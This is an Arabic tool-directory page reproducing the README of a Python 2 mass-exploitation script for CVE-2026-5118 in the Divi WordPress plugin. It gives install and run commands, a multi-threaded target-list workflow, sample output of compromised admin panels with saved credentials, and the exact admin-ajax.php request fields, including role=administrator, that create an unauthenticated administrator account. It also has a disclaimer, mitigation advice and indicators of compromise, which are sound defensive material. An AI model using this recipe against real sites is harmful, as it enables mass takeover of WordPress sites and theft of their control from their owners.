Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-5118 — CVE-2026-5118 – استغلال جماعي بلغة Python2 لملحق ووردبريس Divi، تسجيل مدير غير موثّق عبر admin-ajax.php. ماسح متعدد الخيوط مع استخراج nonce. | Kitploit
أدوات/GitHubGitHub/jenderal92/cve-2026-5118
تصعيد الامتيازاتماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالمصادقة
GitHubjenderal92/cve-2026-5118

CVE-2026-5118

CVE-2026-5118 – استغلال جماعي بلغة Python2 لملحق ووردبريس Divi، تسجيل مدير غير موثّق عبر admin-ajax.php. ماسح متعدد الخيوط مع استخراج nonce.

عرض المستودع
منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Divi Form Builder <= 5.1.2 - تصعيد الامتيازات غير المصادق عليه عبر 'role'

⚠️ تحذير: هذه الأداة مخصصة لاختبار الاختراق المصرح به والبحث الأمني فقط.
الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني. استخدم فقط على الأنظمة التي تمتلكها أو لديك إذن كتابي صريح لاختبارها. المزيد من إخلاء المسؤولية يمكنك رؤية إخلاء المسؤولية على غلاف Jenderal92. يمكنك التحقق منه هنا !!!

نظرة عامة

يستغل هذا السكريبت بلغة بايثون 2 ثغرة تصعيد امتيازات في إضافة ديفي ووردبريس (ونماذج ديفي المرتبطة بها). يسمح بتسجيل حساب مدير عن بعد عن طريق:

  • استخراج fb_nonce من نموذج تسجيل ديفي للهدف.
  • إرسال طلب متعدد الأجزاء مُصمم إلى /wp-admin/admin-ajax.php مع role=administrator.
  • الكشف تلقائيًا عن النجاح وحفظ عناوين URL المخترقة للمدير.

الميزات

  • ✅ متعدد الخيوط (افتراضي 20 خيط) للمسح السريع.
  • ✅ تطبيع URL تلقائي – يضيف https:// إذا كان مفقودًا.
  • ✅ استخراج nonce باستخدام أنماط regex متعددة (JavaScript مضمنة، مدخلات مخفية، de_fb_obj).
  • ✅ طلب multipart/form-data يحاكي إرسال متصفح شرعي.
  • ✅ الكشف عن النجاح عبر كلمات استجابة (success, user_id, user created, إلخ).
  • ✅ حفظ النتائج في results.txt بالتنسيق:
    https://target.com/wp-admin/ | username | password

المتطلبات

  • Python 2.7 (يستخدم urllib2, Queue, threading – غير متوافق مع بايثون 3 بدون تعديلات)
  • قائمة بعناوين URL للهدف (واحد لكل سطر)

التثبيت

root@kitploit:~
git clone https://github.com/Jenderal92/CVE-2026-5118.git
cd CVE-2026-5118
chmod +x CVE-2026-5118.py

الاستخدام

1. تحضير قائمة الأهداف

أنشئ ملفًا نصيًا يحتوي على نطاق أو URL واحد لكل سطر. يمكنك حذف http:// / https:// – سيضيف السكريبت https:// افتراضيًا.

مثال targets.txt:

root@kitploit:~
example.com
https://vulnerable-site.com
http://127.0.0.1/wordpress
test-site.org

2. تشغيل الاستغلال

root@kitploit:~
python CVE-2026-5118.py targets.txt

3. مثال الإخراج

root@kitploit:~
[*] Total targets : 4
[*] Credentials   : Attacker / Attacker@123#+
[*] Threads       : 20
[*] Output file   : results.txt

[1] Checking https://example.com
[+] SUCCESS! https://example.com/wp-admin/

[2] Checking https://vulnerable-site.com
[+] SUCCESS! https://vulnerable-site.com/wp-admin/

[3] Checking http://192.168.1.100/wordpress
[3] FAILED  http://192.168.1.100/wordpress

[4] Checking https://test-site.org
[4] FAILED  https://test-site.org

=== DONE ===
Successful: 2 / 4

4. ملف النتائج (results.txt)

root@kitploit:~
https://example.com/wp-admin/|Attacker|Attacker@123#+
https://vulnerable-site.com/wp-admin/|Attacker|Attacker@123#+

الإعدادات

يمكنك تخصيص المتغيرات التالية في أعلى السكريبت:

كيف يعمل

  1. تطبيع URL – يضيف https:// إذا لم يتم توفير مخطط.
  2. استخراج nonce – يجلب الصفحة الرئيسية (أو صفحة التسجيل) ويبحث عن fb_nonce باستخدام أنماط regex.
  3. بناء الطلب – يُنشئ طلب POST من نوع multipart/form-data يحتوي على:
    • action=de_fb_ajax_submit_ajax_handler
    • fb_nonce=<nonce المستخرج>
    • role=administrator
    • de_fb_user_login / user_login
    • de_fb_user_pass / user_pass
    • de_fb_user_email / user_email
  4. إرسال إلى admin‑ajax.php – إذا كان الرد يحتوي على أي كلمات نجاح، يتم وضع علامة على الهدف كضعيف.

الكشف والتخفيف

لمسؤولي ووردبريس الذين يستخدمون ديفي:

  • تحديث ديفي وجميع الإضافات المرتبطة إلى أحدث إصدار.
  • تعطيل التسجيل العام إذا لم يكن ضروريًا.
  • استخدم إضافة أمان (Wordfence, Sucuri) لمراقبة طلبات admin-ajax.php.
  • تطبيق reCAPTCHA على جميع نماذج التسجيل.
  • لا تعرض أبدًا نماذج تسجيل تحتوي على معلمة role يمكن التلاعب بها.

مؤشرات الاختراق (IOCs):

  • طلبات غير متوقعة إلى admin-ajax.php مع action=de_fb_ajax_submit_ajax_handler
  • مستخدمون جدد من مسؤولي النظام بأسماء مستخدمين مشبوهة (مثل Attacker)
  • بيانات POST تحتوي على role=administrator في سجلات الوصول

إخلاء المسؤولية القانوني

هذا البرنامج مقدم لأغراض تعليمية واختبار أمني مصرح به فقط. لا يتحمل المؤلف أي مسؤولية عن إساءة الاستخدام أو الضرر الناجم عن هذه الأداة. باستخدام هذا البرنامج، فإنك توافق على:

  • الحصول على إذن كتابي من مالك النظام قبل الاختبار.
  • الامتثال لجميع القوانين السارية (CFAA, قانون إساءة استخدام الكمبيوتر, UU ITE, إلخ).
  • حذف أي وصول غير مصرح به تم الحصول عليه فورًا.
  • الإبلاغ عن الثغرات بطريقة مسؤولة إلى البائع المتأثر.

انتهاك هذه الشروط قد يؤدي إلى ملاحقة جنائية أو غرامات أو سجن.

المساهمة

طلبات السحب مرحب بها للتحسينات (نقل إلى بايثون 3، استخراج nonce أفضل، اكتشاف مسار تسجيل إضافي). يرجى الحفاظ على إخلاء المسؤولية الأخلاقي.

تنزيل الأداة
VariableDefaultDescription
DEFAULT_USERNAMEAttackerاسم المستخدم للتسجيل
DEFAULT_PASSWORDAttacker@123#+كلمة المرور (قوية مع أحرف خاصة)
DEFAULT_EMAIL[email protected]عنوان البريد الإلكتروني
THREAD_COUNT20عدد الخيوط المتزامنة
OUTPUT_FILEresults.txtالملف لحفظ الأهداف الناجحة
  • حفظ النتيجة – يكتب عنوان URL للمدير وبيانات الاعتماد إلى ملف الإخراج.